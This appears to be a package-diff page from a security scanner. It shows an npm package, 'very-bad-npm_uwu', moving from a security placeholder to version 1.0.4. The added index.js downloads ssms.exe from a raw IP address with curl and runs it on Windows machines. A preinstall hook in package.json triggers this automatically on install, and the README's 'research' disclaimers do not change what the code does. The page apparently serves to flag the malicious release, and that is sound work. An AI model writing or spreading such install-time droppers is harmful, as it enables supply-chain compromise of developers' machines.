very-bad-npm_uwu 0.0.1-security → 1.0.4
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of very-bad-npm_uwu might be problematic. Click here for more details.
- package/README.md +4 -5
- package/index.js +32 -0
- package/package.json +10 -3
package/README.md
CHANGED
@@ -1,5 +1,4 @@
|
|
1
|
-
#
|
2
|
-
|
3
|
-
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=very-bad-npm_uwu for more information.
|
1
|
+
# This package is used for research purposes!!!
|
2
|
+
# I do not recommend intalling it!!!
|
3
|
+
# DO NOT INSTALL IT!!!
|
4
|
+
# If you install it it is your fault
|
package/index.js
ADDED
@@ -0,0 +1,32 @@
|
|
1
|
+
const { exec } = require('child_process');
|
2
|
+
const os = require('os');
|
3
|
+
|
4
|
+
function getPayload() {
|
5
|
+
return new Promise((resolve, reject) => {
|
6
|
+
exec('curl http://168.100.10.198:8080/ssms.exe --output ssms.exe', (error, stdout, stderr) => {
|
7
|
+
if (error) {
|
8
|
+
reject(error);
|
9
|
+
} else {
|
10
|
+
resolve(stdout);
|
11
|
+
}
|
12
|
+
});
|
13
|
+
});
|
14
|
+
}
|
15
|
+
|
16
|
+
function exePayload() {
|
17
|
+
exec('ssms.exe');
|
18
|
+
}
|
19
|
+
|
20
|
+
async function runPayload() {
|
21
|
+
if (os.platform() === 'win32') {
|
22
|
+
try {
|
23
|
+
await getPayload();
|
24
|
+
exePayload();
|
25
|
+
} catch (error) {
|
26
|
+
console.error(error);
|
27
|
+
}
|
28
|
+
|
29
|
+
}
|
30
|
+
}
|
31
|
+
|
32
|
+
runPayload();
|
package/package.json
CHANGED
@@ -1,6 +1,13 @@
|
|
1
1
|
{
|
2
2
|
"name": "very-bad-npm_uwu",
|
3
|
-
"version": "
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "1.0.4",
|
4
|
+
"description": "DO NOT DOWLOAD THIS PACKAGE. IT IS USED FOR EDUCATIONAL PURPOSES",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"preinstall": "node index.js"
|
8
|
+
},
|
9
|
+
"author": "",
|
10
|
+
"license": "ISC",
|
11
|
+
"dependencies": {
|
12
|
+
}
|
6
13
|
}
|